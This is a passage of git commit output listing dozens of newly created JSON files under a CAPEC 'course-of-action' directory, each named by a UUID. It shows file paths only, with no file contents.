capec/course-of-action/course-of-action--0ad6da2b-80f2-47f6-a445-059173eb3363.json create mode 100644 capec/course-of-action/course-of-action--0ae70d35-18dd-46fc-9e02-744c0c6ee444.json create mode 100644 capec/course-of-action/course-of-action--0b1d3e9d-f2a7-4762-8047-d770b6172d7c.json create mode 100644 capec/course-of-action/course-of-action--0b3b5c92-65ea-4083-aaaf-95a22c6597cb.json create mode 100644 capec/course-of-action/course-of-action--0b8e6f93-072a-40f9-b438-9618b0494301.json create mode 100644 capec/course-of-action/course-of-action--0c3b87ec-c44e-467b-8066-ee96dfcdfc80.json create mode 100644 capec/course-of-action/course-of-action--0ca911eb-ac2a-473f-92a6-64e6cc63b937.json create mode 100644 capec/course-of-action/course-of-action--0cc989fe-e338-41db-8c57-5824d3cc66ec.json create mode 100644 capec/course-of-action/course-of-action--0d6a011b-a753-49c9-9e5d-1a8a67c60cf5.json create mode 100644 capec/course-of-action/course-of-action--0d786130-47ff-416a-9a8b-aafbccdd7e07.json create mode 100644 capec/course-of-action/course-of-action--0d9c19f1-20dd-4569-afb6-edbc667c16b1.json create mode 100644 capec/course-of-action/course-of-action--0e2f45e3-d988-4da1-a19f-202c51c40a0f.json create mode 100644 capec/course-of-action/course-of-action--0e44c49a-a553-4aaf-81b5-3a5d77a541e7.json create mode 100644 capec/course-of-action/course-of-action--0e72181f-5edb-4eb7-b284-c94a64e6bb32.json create mode 100644 capec/course-of-action/course-of-action--0f8b7652-8d89-485d-9984-db6eb7de0b20.json create mode 100644 capec/course-of-action/course-of-action--108a12a8-aad4-460b-ba9c-77767c067d93.json create mode 100644 capec/course-of-action/course-of-action--10a1cb24-88c0-4d99-a60d-ff3df2e2b003.json create mode 100644 capec/course-of-action/course-of-action--10d32cb0-4883-4af3-b968-f1961bae95e9.json create mode 100644 capec/course-of-action/course-of-action--116eb05d-d01e-415d-b3d1-7d05b9b2d526.json create mode 100644 capec/course-of-action/course-of-action--1179db20-1dbd-48ea-bd08-9e800a816d56.json create mode 100644 capec/course-of-action/course-of-action--12149275-8476-4bee-923b-b2677b531ca2.json create mode 100644 capec/course-of-action/course-of-action--12dd252e-6383-44c6-a23a-94f0d18dd77a.json create mode 100644 capec/course-of-action/course-of-action--12eeb4d4-407d-43cf-8ead-716c30d36e97.json create mode 100644 capec/course-of-action/course-of-action--13872a21-011c-46a9-a2b3-e68f5b91dd65.json create mode 100644 capec/course-of-action/course-of-action--13b80a43-a746-4d74-af3f-22e3e8109106.json create mode 100644 capec/course-of-action/course-of-action--13d834cf-5ff3-49ae-9172-f9cbf8f6762f.json create mode 100644 capec/course-of-action/course-of-action--14767fc9-6805-46f8-b31b-17dbece67e4d.json create mode 100644 capec/course-of-action/course-of-action--14b2914a-fe72-4ed6-8a7b-1b4f29ad4acf.json create mode 100644 capec/course-of-action/course-of-action--15514f1d-6e2c-44fa-a059-2eb4d659c9a6.json create mode 100644 capec/course-of-action/course-of-action--15ad2592-0331-4e12-ab0f-0d22bcf287dd.json create mode 100644 capec/course-of-action/course-of-action--15af2ba6-0fe3-42ae-aa07-efeaba06d2d6.json create mode 100644 capec/course-of-action/course-of-action--15dab0ed-4921-4962-b455-5af52a1e6d96.json create mode 100644 capec/course-of-action/course-of-action--16197adf-0d21-44d9-8143-1b2e90f288f1.json create mode 100644 capec/course-of-action/course-of-action--166fe84f-a603-45c3-99ba-785be6639265.json create mode 100644 capec/course-of-action/course-of-action--16ed8c75-c48b-47c3-9786-2402110e60c0.json create mode 100644 capec/course-of-action/course-of-action--1742217f-e758-4f36-b907-f5aba0c2abd1.json create mode 100644 capec/course-of-action/course-of-action--1782e252-1717-4a56-8f06-144c25768ea0.json create mode 100644 capec/course-of-action/course-of-action--17b27433-058d-4611-8ea1-bf410322ede5.json create mode 100644 capec/course-of-action/course-of-action--181e9016-6187-47ba-aa85-ff726a951dae.json create mode 100644 capec/course-of-action/course-of-action--1834ed8b-031c-4fde-b646-172ad9a8f15d.json create mode 100644 capec/course-of-action/course-of-action--1924d54e-1b4b-47d5-9a5a-ce7bacce5ac2.json create mode 100644 capec/course-of-action/course-of-action--1950e4b9-d4fc-491a-a4cd-040c485933bf.json create mode 100644 capec/course-of-action/course-of-action--19636648-c6d0-40d4-abe6-b290bc6df849.json create mode 100644 capec/course-of-action/course-of-action--1a089e2b-9422-439a-a57b-3cdbc11a2056.json create mode 100644 capec/course-of-action/course-of-action--1a1c1ba7-1335-44e4-a14e-2fc2428dc2d3.json create mode 100644 capec/course-of-action/course-of-action--1a69aad1-921e-4766-9425-f61387d1dda1.json create mode 100644 capec/course-of-action/course-of-action--1aec628a-36f6-4e86-a54a-24586daa551a.json create mode 100644 capec/course-of-action/course-of-action--1b4612ba-6943-4cdf-98b9-b917db8790f7.json create mode 100644 capec/course-of-action/course-of-action--1bb015ae-0c88-440b-bfa0-db24d236d012.json create mode 100644 capec/course-of-action/course-of-action--1d71ce40-c669-47a9-b734-e8a4457d41b7.json create mode 100644 capec/course-of-action/course-of-action--1da47c6c-e10f-4276-bbe6-582f7fc465ab.json create mode 100644 capec/course-of-action/course-of-action--1da8555a-673e-49d9-a3a6-fa1404b9d1a9.json create mode 100644 capec/course-of-action/course-of-action--1dd51708-9b86-403a-8e0c-183605f1d327.json create mode 100644 capec/course-of-action/course-of-action--1e30abe4-e169-4463-9f57-4d9a61918f7a.json create mode 100644 capec/course-of-action/course-of-action--1e44c94e-9c2c-4855-b235-6abd990a40b4.json create mode 100644 capec/course-of-action/course-of-action--1e9eba5c-8854-484c-9658-e9a241568533.json create mode 100644 capec/course-of-action/course-of-action--1eac470d-04ba-449c-b2d8-34fa512d4356.json create mode 100644 capec/course-of-action/course-of-action--1f80519c-ae05-4092-9e9c-2fe2fc16071f.json create mode 100644 capec/course-of-action/course-of-action--1f9c29dd-86fa-4511-877e-bf893797eb91.json create mode 100644 capec/course-of-action/course-of-action--1fad77cc-fcbb-4256-9333-999394016ef9.json create mode 100644 capec/course-of-action/course-of-action--1fb6f288-179f-4b15-8414-32b5d480c21a.json create mode 100644 capec/course-of-action/course-of-action--202f7849-cf4c-4f0e-91c9-edc6cb29b266.json create mode 100644 capec/course-of-action/course-of-action--208d3eef-ea1f-4ab5-bef3-7691c4b0ffac.json create mode 100644 capec/course-of-action/course-of-action--20c7d57f-ca94-4776-ba01-377f4e5bf7bb.json create mode 100644 capec/course-of-action/course-of-action--20eef050-3b31-4e1b-a34a-d43c0f6f3870.json create mode 100644 capec/course-of-action/course-of-action--2169ecc1-a465-4c48-a073-853c776f16ee.json create mode 100644 capec/course-of-action/course-of-action--21ed7193-3366-410a-8a54-f78088f80cca.json create mode 100644 capec/course-of-action/course-of-action--2248876f-47b7-4818-9150-38be47817f40.json create mode 100644 capec/course-of-action/course-of-action--22d9d0ed-1d6b-4e93-8f8f-faa6b4d6ef6e.json create mode 100644 capec/course-of-action/course-of-action--2323dd67-cf08-4f18-9615-624b3b78eb08.json create mode 100644 capec/course-of-action/course-of-action--234cea73-49f4-4e3c-acc9-1960335386d9.json create mode 100644 capec/course-of-action/course-of-action--239b3766-bea2-4e5f-9e51-42ff425ebf16.json create mode 100644 capec/course-of-action/course-of-action--23e84cfc-4f98-403a-a6a5-9e1f288a238a.json create mode 100644 capec/course-of-action/course-of-action--24697e41-07a0-4c75-b84d-68c6bd2a8b8f.json create mode 100644 capec/course-of-action/course-of-action--24787b8e-b486-41f2-b8f3-1cd9d79a449a.json create mode 100644 capec/course-of-action/course-of-action--2491ddd6-61d6-4cbd-9641-8a5523b27f8d.json create mode 100644 capec/course-of-action/course-of-action--24d6271d-29ca-41d8-baf7-e74c5a8d438c.json create mode 100644 capec/course-of-action/course-of-action--256453d5-85cc-46e2-87ea-0159c107dc63.json create mode 100644 capec/course-of-action/course-of-action--25cbb891-6fa0-4c27-870f-1c8442bf0a22.json create mode 100644 capec/course-of-action/course-of-action--25de739b-9f9e-4f6f-b5d2-13d8e9e47227.json create mode 100644 capec/course-of-action/course-of-action--26e81028-3a75-4321-94a2-71630c84ef29.json create mode 100644 capec/course-of-action/course-of-action--2734556b-0c47-4d4b-9c8e-e1e8fa98eb47.json create mode 100644 capec/course-of-action/course-of-action--274ded76-0511-4a3b-8d7e-89a49c0c160e.json create mode 100644 capec/course-of-action/course-of-action--2786b040-a5e9-4b8f-9fe9-e8fbd043985e.json create mode 100644 capec/course-of-action/course-of-action--280047d5-2fea-4418-8952-f13e43540cdf.json create mode 100644 capec/course-of-action/course-of-action--28d4d037-94a9-4035-9477-678d3e0be043.json create mode 100644 capec/course-of-action/course-of-action--28d662f7-7950-46fd-9291-865c8a7da492.json create mode 100644 capec/course-of-action/course-of-action--29a42808-e171-48df-affd-22dfaa3718b1.json create mode 100644 capec/course-of-action/course-of-action--29a68aab-1993-4ce8-8742-cd88c7104498.json create mode 100644 capec/course-of-action/course-of-action--29d228d4-14b2-4cb3-a702-37b58b13d7bd.json create mode 100644 capec/course-of-action/course-of-action--2a257365-86f5-44ce-84f9-ee47d9d88243.json create mode 100644 capec/course-of-action/course-of-action--2b281151-7e37-44b5-963a-2b376e8e2f26.json create mode 100644 capec/course-of-action/course-of-action--2bc98c7e-27ff-46e6-bf2f-cdda5500c8f7.json create mode 100644 capec/course-of-action/course-of-action--2bc9caed-efa5-4928-9c7c-99221525dd53.json create mode 100644 capec/course-of-action/course-of-action--2bece2ea-0104-4e65-ab99-86695150eed4.json create mode 100644 capec/course-of-action/course-of-action--2c6dd98d-3862-41ea-a343-97517e8c78fb.json create mode 100644 capec/course-of-action/course-of-action--2cdc30fb-468f-460e-995b-1f0e1827dc75.json create mode 100644 capec/course-of-action/course-of-action--2cf7aa67-1388-42af-a7a4-91efe4879ba6.json create mode 100644 capec/course-of-action/course-of-action--2d0a4aa4-687f-4549-bc2d-0c2d6b971dff.json create mode 100644 capec/course-of-action/course-of-action--2d1364f8-6809-4488-8f00-17bc8731f99c.json create mode 100644 capec/course-of-action/course-of-action--2db6f425-6fb9-40de-9d29-7f217e0df641.json create mode 100644 capec/course-of-action/course-of-action--2eb65f7c-003a-4479-b5f2-16f6e5794151.json create mode 100644 capec/course-of-action/course-of-action--2f881ca2-2823-42d7-b6bd-de209f7d169e.json create mode 100644 capec/course-of-action/course-of-action--2f9fa820-a8e2-42a0-9940-2fa454c03dab.json create mode 100644 capec/course-of-action/course-of-action--301e5bbb-d0b4-4c64-93b0-d83f7a317420.json create mode 100644 capec/course-of-action/course-of-action--3083373d-daa1-4da5-b255-b68e35ada6f3.json create mode 100644 capec/course-of-action/course-of-action--3093ecc0-8588-4daa-b7a1-9aaeb6a93daa.json create mode 100644 capec/course-of-action/course-of-action--30b928bb-6385-4bb6-b880-888bbc5e2757.json create mode 100644 capec/course-of-action/course-of-action--31915125-c52a-4627-a701-7170b8709fbc.json create mode 100644 capec/course-of-action/course-of-action--3310f341-63e4-40c7-a48c-36fa12037d30.json create mode 100644 capec/course-of-action/course-of-action--33145ebc-8ed7-4a1f-a283-c5ba0073367b.json create mode 100644 capec/course-of-action/course-of-action--3463f037-c2bb-4801-a794-50ad603d3a5b.json create mode 100644 capec/course-of-action/course-of-action--34b67659-f7a2-4c8c-97b2-84a3d743bbd0.json create mode 100644 capec/course-of-action/course-of-action--358fa983-5baa-4968-8cdf-ad68b9533d0f.json create mode 100644 capec/course-of-action/course-of-action--36186001-cd10-4add-b390-984e37252cc1.json create mode 100644 capec/course-of-action/course-of-action--3661b9f7-963d-4aaa-a0fd-26866bbfe977.json create mode 100644 capec/course-of-action/course-of-action--367827bd-6e63-4041-96a8-7e5cfcdac56c.json create mode 100644 capec/course-of-action/course-of-action--36a18ef6-828f-4581-8a24-52bfd4172d28.json create mode 100644 capec/course-of-action/course-of-action--3708e269-8e45-425f-bf69-d91b54911e5c.json create mode 100644 capec/course-of-action/course-of-action--375c2715-0a0f-4d58-bbf6-e79d12e250f5.json create mode 100644 capec/course-of-action/course-of-action--37dc71fb-c194-4497-9f50-a2c549861e0c.json create mode 100644 capec/course-of-action/course-of-action--3868f5b2-2b41-4c78-957f-67972e41c9ec.json create mode 100644 capec/course-of-action/course-of-action--3959d69a-ac6a-43ae-a89e-0dc12e8be517.json create mode 100644 capec/course-of-action/course-of-action--3961c98f-bbcb-4b45-8a65-b5a2e37909cf.json create mode 100644 capec/course-of-action/course-of-action--39a3cf0d-a301-4aff-b32c-1ed38ed15957.json create mode 100644 capec/course-of-action/course-of-action--39addebd-df68-43c2-84f2-ae1ba9653ad8.json create mode 100644 capec/course-of-action/course-of-action--3a00550f-fc0c-4882-a97f-c5d874abb7e3.json create mode 100644 capec/course-of-action/course-of-action--3a74698d-3c03-4e02-8576-c503ba6b8989.json create mode 100644 capec/course-of-action/course-of-action--3a98e579-34f3-4645-b229-ead3e426f738.json create mode 100644 capec/course-of-action/course-of-action--3b18c283-ce7f-40c6-a077-7202626fc529.json create mode 100644 capec/course-of-action/course-of-action--3b8e47a6-3169-4bd1-a564-746a25883ebf.json create mode 100644 capec/course-of-action/course-of-action--3c6953bd-ae60-4f04-96f3-3baa4a49cceb.json create mode 100644 capec/course-of-action/course-of-action--3cf0b29a-1708-4c94-996e-8606b5832e54.json create mode 100644 capec/course-of-action/course-of-action--3d2cb91d-f2d5-4e7f-a1dd-eb3e1dec3160.json create mode 100644 capec/course-of-action/course-of-action--3d674156-684a-44c3-b792-cacca604475c.json create mode 100644 capec/course-of-action/course-of-action--3e6af105-53da-4ebb-ad68-e251d0305e50.json create mode 100644 capec/course-of-action/course-of-action--3f3f61d1-e084-41db-87d8-678f7e11b785.json create mode 100644 capec/course-of-action/course-of-action--3f84c0d9-28d1-4682-b953-e1bacd7d8dbf.json create mode 100644 capec/course-of-action/course-of-action--3fb0274e-adc7-4bec-a0e9-8d6d208ae5e9.json create mode 100644 capec/course-of-action/course-of-action--3fd26460-4bce-4762-8ec0-bf8aeb3955f3.json create mode 100644 capec/course-of-action/course-of-action--405d41ea-38ed-499b-85dd-36732f74cbac.json create mode 100644 capec/course-of-action/course-of-action--428b6c2b-e7be-46d9-b273-7e70511208da.json create mode 100644 capec/course-of-action/course-of-action--430d5b07-c34b-41e6-8ca6-ba6b15e2d7bc.json create mode 100644 capec/course-of-action/course-of-action--43447d56-2dd9-4251-ac13-dbaf795debbc.json create mode 100644 capec/course-of-action/course-of-action--43f74fd8-92d6-4daa-8165-b99a12cb6248.json create mode 100644 capec/course-of-action/course-of-action--43f7c68c-4789-41e6-ba7e-dcec87f20649.json create mode 100644 capec/course-of-action/course-of-action--442f1611-a705-47fb-b7a4-637fd7773ea1.json create mode 100644 capec/course-of-action/course-of-action--443002d8-3f49-4db7-9712-ddd66f4ebbad.json create mode 100644 capec/course-of-action/course-of-action--44d3d85f-b98a-4044-870a-30d49c7650fc.json create mode 100644 capec/course-of-action/course-of-action--44e277ab-ef98-46e0-b905-4280ecfb32e7.json create mode 100644 capec/course-of-action/course-of-action--45721c66-c4ff-4ca9-b2ba-52361fe49917.json create mode 100644 capec/course-of-action/course-of-action--45a7c54b-dd25-4f55-bbb2-deae94e43cff.json create mode 100644 capec/course-of-action/course-of-action--45bdb955-8441-4ff0-ab60-682fcc086f9a.json create mode 100644 capec/course-of-action/course-of-action--4603ddfb-30b5-4137-826f-1946d59b59e9.json create mode 100644 capec/course-of-action/course-of-action--46cc2cb0-eede-4b3a-99b8-bb4fc1b2bd54.json create mode 100644 capec/course-of-action/course-of-action--47ff9928-47a5-430a-ab40-693332919418.json create mode 100644 capec/course-of-action/course-of-action--484680dd-30ae-434b-9cd3-1f30cf495f3b.json create mode 100644 capec/course-of-action/course-of-action--489ca701-7d90-4ae7-9ab8-5f2253c99767.json create mode 100644 capec/course-of-action/course-of-action--496c5a9c-3c8c-4887-a46a-6b3230ed0c06.json create mode 100644 capec/course-of-action/course-of-action--49f71767-3371-423c-8adc-be064d5cb5b4.json create mode 100644 capec/course-of-action/course-of-action--4a5433ba-7561-46db-a5d6-3f971efc2d6a.json create mode 100644 capec/course-of-action/course-of-action--4a88fa86-0860-40da-ad2f-8fb4df569c1b.json create mode 100644 capec/course-of-action/course-of-action--4bcc3ad0-15a6-460c-8082-77aea25f0ab0.json create mode 100644 capec/course-of-action/course-of-action--4c39b271-b06b-45c4-89a8-b857142538bd.json create mode 100644 capec/course-of-action/course-of-action--4d0336dc-c879-4610-bec0-033df2c9379a.json create mode 100644 capec/course-of-action/course-of-action--4d66c05f-25c0-4ae2-96db-b955fdde0af0.json create mode 100644 capec/course-of-action/course-of-action--4d92cf6d-e95c-427c-89c7-31a58f807f99.json create mode 100644 capec/course-of-action/course-of-action--4d985d74-f2cb-42d5-b6ec-e4d4c1515212.json create mode 100644 capec/course-of-action/course-of-action--4e19551b-90d1-41f9-b8a4-8d700b2bc29a.json create mode 100644 capec/course-of-action/course-of-action--4f26db10-8931-420a-9894-08ba87d842af.json create mode 100644 capec/course-of-action/course-of-action--4f65d950-6127-48a7-8043-f6fe1f85a9d7.json create mode 100644 capec/course-of-action/course-of-action--4fc7792e-2ac1-4852-aab4-e7894a72ad89.json create mode 100644 capec/course-of-action/course-of-action--4fd99982-ce00-4751-8e64-67f7257c25c4.json create mode 100644 capec/course-of-action/course-of-action--501aa08c-8325-4076-945a-95272170d1b9.json create mode 100644 capec/course-of-action/course-of-action--50a35813-bde4-45f3-a4b7-d78ab0fb815e.json create mode 100644 capec/course-of-action/course-of-action--51032946-3d2e-4baa-a10d-aa22a01421b3.json create mode 100644 capec/course-of-action/course-of-action--513e1a8c-8153-40c3-8452-672f95b31666.json create mode 100644 capec/course-of-action/course-of-action--518cd53f-cc9a-4c07-83d9-cefd812eddc3.json create mode 100644 capec/course-of-action/course-of-action--51b77eec-ff72-449d-850d-ed8bd19ca6b3.json create mode 100644 capec/course-of-action/course-of-action--52384d4d-929b-4a22-8f18-9b8600cb66b3.json create mode 100644 capec/course-of-action/course-of-action--52eb1f45-37ca-4bae-980d-8358d067e7fc.json create mode 100644 capec/course-of-action/course-of-action--52ef316b-8bda-44a7-962e-41f8a0b47c62.json create mode 100644 capec/course-of-action/course-of-action--53739b65-3b71-4ed3-b31a-28ab1b090551.json create mode 100644 capec/course-of-action/course-of-action--54200ccf-356d-40d9-abff-5906b5d13075.json create mode 100644 capec/course-of-action/course-of-action--544e485d-ae4a-4bad-b117-6340b93eda38.json create mode 100644 capec/course-of-action/course-of-action--54ded23f-205f-4485-b1fb-f229717cd4d0.json create mode 100644 capec/course-of-action/course-of-action--54f22236-6457-4a31-a58b-f99f393d8892.json create mode 100644 capec/course-of-action/course-of-action--55095dcf-2954-4dc8-9c3a-2038d5ffbf2a.json create mode 100644 capec/course-of-action/course-of-action--55337545-1e96-4f8c-b0e5-181084b3a3e8.json create mode 100644 capec/course-of-action/course-of-action--557e63a0-6f2a-4ffd-baf2-a6dc676a7156.json create mode 100644 capec/course-of-action/course-of-action--561921de-6d1a-4bdf-aa42-2fde54309463.json create mode 100644 capec/course-of-action/course-of-action--5630615d-5b7f-4130-a543-f6c837c62b7a.json create mode 100644 capec/course-of-action/course-of-action--563ecada-f5a4-4f5b-952d-7281408f06c8.json create mode 100644 capec/course-of-action/course-of-action--5670943e-0510-475a-bcb5-8a62e354d5d3.json create mode 100644 capec/course-of-action/course-of-action--56ee7284-adfd-41b9-b592-5092da42b889.json create mode 100644 capec/course-of-action/course-of-action--581e502e-b7d2-4e2e-abf8-22eaf3ffe9db.json create mode 100644 capec/course-of-action/course-of-action--58fa30b6-7537-4d57-a211-ce13b21f2150.json create mode 100644 capec/course-of-action/course-of-action--59125c5d-d363-4939-9367-09200b835952.json create mode 100644 capec/course-of-action/course-of-action--59ede157-2056-4a52-af14-09cf093ca618.json create mode 100644 capec/course-of-action/course-of-action--59f6f5cc-aab7-46d0-bf72-761b5ef7c45d.json create mode 100644 capec/course-of-action/course-of-action--5a311df1-0f52-43b4-bd8c-2213d2e8213e.json create mode 100644 capec/course-of-action/course-of-action--5a3e396c-2570-4ed5-9da8-0583ffc0cb73.json create mode 100644 capec/course-of-action/course-of-action--5a524e70-22d0-4145-bb4b-534316b6ba77.json create mode 100644 capec/course-of-action/course-of-action--5a6c793b-b5f6-457d-b758-59fb951a3ac3.json create mode 100644 capec/course-of-action/course-of-action--5a8152fa-c01e-4c85-b859-5cf3fcd7e926.json create mode 100644 capec/course-of-action/course-of-action--5ab5bb92-9b0c-4d06-a27f-392c82b316c5.json create mode 100644 capec/course-of-action/course-of-action--5b853df1-149c-4ea6-a60a-aee20161f9a8.json create mode 100644 capec/course-of-action/course-of-action--5c1f4869-4745-4313-96aa-60314bb85b7d.json create mode 100644 capec/course-of-action/course-of-action--5c9bdb74-17c0-4ad3-a2e5-343766003d65.json create mode 100644 capec/course-of-action/course-of-action--5cccb5c4-5871-41f4-a89c-e04392838811.json create mode 100644 capec/course-of-action/course-of-action--5d27eaef-7db0-4804-958c-8b5624bbd8af.json create mode 100644 capec/course-of-action/course-of-action--5d6a950c-d719-4695-ac9a-e050f39c65e6.json create mode 100644 capec/course-of-action/course-of-action--5dad1672-a750-4909-8d3a-f583109c6a7b.json create mode 100644 capec/course-of-action/course-of-action--5db3f6ef-aad5-4b2f-90fc-db232791760b.json create mode 100644 capec/course-of-action/course-of-action--5eb18362-1cac-41e2-ad66-e4887a473ab0.json create mode 100644 capec/course-of-action/course-of-action--5efe162c-e441-40c4-8bbb-da7c7b9aa0d0.json create mode 100644 capec/course-of-action/course-of-action--5f1774e8-9dca-4cd7-820a-f1e7a4c29bb2.json create mode 100644 capec/course-of-action/course-of-action--5f333309-dde8-4d92-b47c-92de9653c262.json create mode 100644 capec/course-of-action/course-of-action--5f697f6c-8b52-40bb-8305-138fdf96c077.json create mode 100644 capec/course-of-action/course-of-action--6001764e-65ac-41ff-a506-8e25b1d674e5.json create mode 100644 capec/course-of-action/course-of-action--6024a8f5-454d-4e16-9279-9075d9fc39cf.json create mode 100644 capec/course-of-action/course-of-action--60484e46-3cf9-4fc7-974b-fb842184bbb2.json create mode 100644 capec/course-of-action/course-of-action--60486ac0-e215-4bc0-b0d7-aeaab2a90b9b.json create mode 100644 capec/course-of-action/course-of-action--60e5864c-2b6e-4ac0-8bdd-82ecc4047c38.json create mode 100644 capec/course-of-action/course-of-action--61b2e7d2-67dd-4305-9afd-b015b4174c88.json create mode 100644 capec/course-of-action/course-of-action--61cfd195-6c06-485f-851b-d522704db751.json create mode 100644 capec/course-of-action/course-of-action--62130951-9bef-40ea-904e-a1603cfeb0d9.json create mode 100644 capec/course-of-action/course-of-action--62b2537e-f487-4110-9642-64ab6fa2d255.json create mode 100644 capec/course-of-action/course-of-action--62c47826-007a-4ee6-8740-9efb84ba061c.json create mode 100644 capec/course-of-action/course-of-action--62e3eebc-34ea-4098-a02d-f901f8762132.json create mode 100644 capec/course-of-action/course-of-action--63324b5f-6636-4687-8aa4-f81791a2a577.json create mode 100644 capec/course-of-action/course-of-action--640b34ce-eb05-40c3-854b-abdea45ad098.json create mode 100644 capec/course-of-action/course-of-action--652fe724-beaf-4db6-9b95-acbaeb383650.json create mode 100644 capec/course-of-action/course-of-action--6593210b-d532-485d-8aad-22672f5f04a2.json create mode 100644 capec/course-of-action/course-of-action--65e983bd-ecc0-40dc-ae11-8767d8a747f1.json create mode 100644 capec/course-of-action/course-of-action--666a0b8c-b596-4acf-a365-fc65d2731747.json create mode 100644 capec/course-of-action/course-of-action--667a9827-66c0-4efa-ba4b-02699ee52948.json create mode 100644 capec/course-of-action/course-of-action--67124c75-a596-4e39-84b5-d2de7b878fc0.json create mode 100644 capec/course-of-action/course-of-action--691f66b9-07a3-4c94-8e66-2aa19dd6f99b.json create mode 100644 capec/course-of-action/course-of-action--693a597c-3229-4a11-88ac-65d2ef0005c0.json create mode 100644 capec/course-of-action/course-of-action--6988f778-25d5-4902-ae93-e06c754ab230.json create mode 100644 capec/course-of-action/course-of-action--6999dccd-e724-4a98-8a41-b69c72825a3d.json create mode 100644 capec/course-of-action/course-of-action--69bb2312-f52f-4ff7-b491-a28d010c2c31.json create mode 100644 capec/course-of-action/course-of-action--69eb9c90-2ae5-4bab-aca8-b86865b9f811.json create mode 100644 capec/course-of-action/course-of-action--6a4ada4e-5df9-4d9e-814b-230bdb0637c8.json create mode 100644 capec/course-of-action/course-of-action--6ae26425-77bb-4201-b54d-b1a2a82e7639.json create mode 100644 capec/course-of-action/course-of-action--6b986b64-a6e5-4076-ab82-cb2088416c02.json create mode 100644 capec/course-of-action/course-of-action--6c587fe5-89a0-42b2-a2ff-ef9b15773cf7.json create mode 100644 capec/course-of-action/course-of-action--6cc43be3-26c7-4a02-93c6-bd3346e0758c.json create mode 100644 capec/course-of-action/course-of-action--6dc1b356-ef19-4ed1-8a64-65470da45dca.json create mode 100644 capec/course-of-action/course-of-action--6e910b7b-38fd-4006-9c1d-774f37ee57cf.json create mode 100644 capec/course-of-action/course-of-action--6f3c5c84-4c2d-44ad-98eb-f4b8bdc4a460.json create mode 100644 capec/course-of-action/course-of-action--6f4e1572-df35-40cd-bd86-f6ab98fb5009.json create mode 100644 capec/course-of-action/course-of-action--6f996c4c-d4ef-471a-9766-e81b471238e4.json create mode 100644 capec/course-of-action/course-of-action--7052d162-d901-485b-9a23-2eee96a9717f.json create mode 100644 capec/course-of-action/course-of-action--705bc137-3094-4299-b3e3-0a101390f074.json create mode 100644 capec/course-of-action/course-of-action--70808a24-58bf-45de-aaaf-1fc1cc949937.json create mode 100644 capec/course-of-action/course-of-action--718c4c5a-471a-4ff2-8fc4-c9cbdaedc15f.json create mode 100644 capec/course-of-action/course-of-action--7195cb36-22ea-4d06-93e2-5ce46840220b.json create mode 100644 capec/course-of-action/course-of-action--71e1e7e8-78ad-407e-9824-3aaeb49440eb.json create mode 100644 capec/course-of-action/course-of-action--724cd67d-adc8-4f12-a881-cd350980aec9.json create mode 100644 capec/course-of-action/course-of-action--72dd2acb-8073-41ff-96fb-770cfa9e5583.json create mode 100644 capec/course-of-action/course-of-action--7352da80-8df6-4540-bcaa-0b02c967b0a6.json create mode 100644 capec/course-of-action/course-of-action--737b495b-88cf-4045-81ad-c988de02409e.json create mode 100644 capec/course-of-action/course-of-action--744bb010-978a-4e8c-804f-164adb0bf938.json create mode 100644 capec/course-of-action/course-of-action--75a293b0-31ff-46d1-8a2c-c0c9b3ff4d90.json create mode 100644 capec/course-of-action/course-of-action--75cfbaa2-4ebd-4bd2-8bcd-1cc9bb5c18f6.json create mode 100644 capec/course-of-action/course-of-action--766199a6-728f-4772-9a27-191e5f8a072e.json create mode 100644 capec/course-of-action/course-of-action--767f4e01-7e92-4db1-84d7-851067a97406.json create mode 100644 capec/course-of-action/course-of-action--76adf409-ce96-41bf-8ec8-bf4527b29b32.json create mode 100644 capec/course-of-action/course-of-action--76fd685c-7ff0-4dcf-98bd-9f3317f37a1f.json create mode 100644 capec/course-of-action/course-of-action--7757d6cb-1ca1-443a-acc2-0e56d96742ee.json create mode 100644 capec/course-of-action/course-of-action--7766bca9-c0e5-45bf-9e34-c8b1d3df00a1.json create mode 100644 capec/course-of-action/course-of-action--776f161f-fbfa-4de1-9f46-a34bffc47545.json create mode 100644 capec/course-of-action/course-of-action--77f349a2-8ab1-4c7b-b811-8d3f0b91e580.json create mode 100644 capec/course-of-action/course-of-action--77f86884-ad34-47be-ade7-4900af686435.json create mode 100644 capec/course-of-action/course-of-action--780e2005-b29c-45e0-abad-0738f19408dd.json create mode 100644 capec/course-of-action/course-of-action--789de7ca-979f-49ca-9234-1036093a6f0a.json create mode 100644 capec/course-of-action/course-of-action--7959d72d-654f-4b44-bc49-1ed26d35b1d2.json create mode 100644 capec/course-of-action/course-of-action--7a0f8efa-951a-4a7f-b072-8dd89b09a288.json create mode 100644 capec/course-of-action/course-of-action--7a5656cc-3ca7-4340-8f17-e7f992258b93.json create mode 100644 capec/course-of-action/course-of-action--7a762e6d-30cc-459f-9650-b3540c4ee9ad.json create mode 100644 capec/course-of-action/course-of-action--7ae62beb-74c3-4146-be41-b2e23a71722b.json create mode 100644 capec/course-of-action/course-of-action--7b9b22b1-1cfe-4dd8-9f3e-9cd9441f2f72.json create mode 100644 capec/course-of-action/course-of-action--7baed235-1f33-4e25-bdf6-eabc38355a9b.json create mode 100644 capec/course-of-action/course-of-action--7be03f8e-bbcc-49da-aec1-39a01323166c.json create mode 100644 capec/course-of-action/course-of-action--7c82f8ed-95b9-4f02-a8ea-b2ef0f98caa1.json create mode 100644 capec/course-of-action/course-of-action--7c98cc13-b10a-43d2-8163-429d75b5f71b.json create mode 100644 capec/course-of-action/course-of-action--7c9cd16d-f622-4abd-b43a-7917cfd404e9.json create mode 100644 capec/course-of-action/course-of-action--7cb528d0-385d-4f5a-91eb-44e1c2b42d08.json create mode 100644 capec/course-of-action/course-of-action--7d1c34a6-521a-45c1-bc71-b4630bbdcd64.json create mode 100644 capec/course-of-action/course-of-action--7d9210eb-2a81-42e2-91a1-6bae4c65ca16.json create mode 100644 capec/course-of-action/course-of-action--7e527f61-08fa-4d94-9b2f-4433107a0933.json create mode 100644 capec/course-of-action/course-of-action--7e686f40-c86b-4881-9137-c67559d032a0.json create mode 100644 capec/course-of-action/course-of-action--7f68adb3-141f-4b73-ac2e-66f76711b5af.json create mode 100644 capec/course-of-action/course-of-action--7f7e04ce-16c7-4477-b567-098e8708dd0b.json create mode 100644 capec/course-of-action/course-of-action--81245812-a329-4abe-8817-6159641985fa.json create mode 100644 capec/course-of-action/course-of-action--818e3196-faa2-469a-ab7a-6127cf8e09fa.json create mode 100644 capec/course-of-action/course-of-action--81f41980-da36-4f82-88d4-bd15852b2adc.json create mode 100644 capec/course-of-action/course-of-action--82e47eb6-c3ad-4ca2-896f-596bab562f50.json create mode 100644 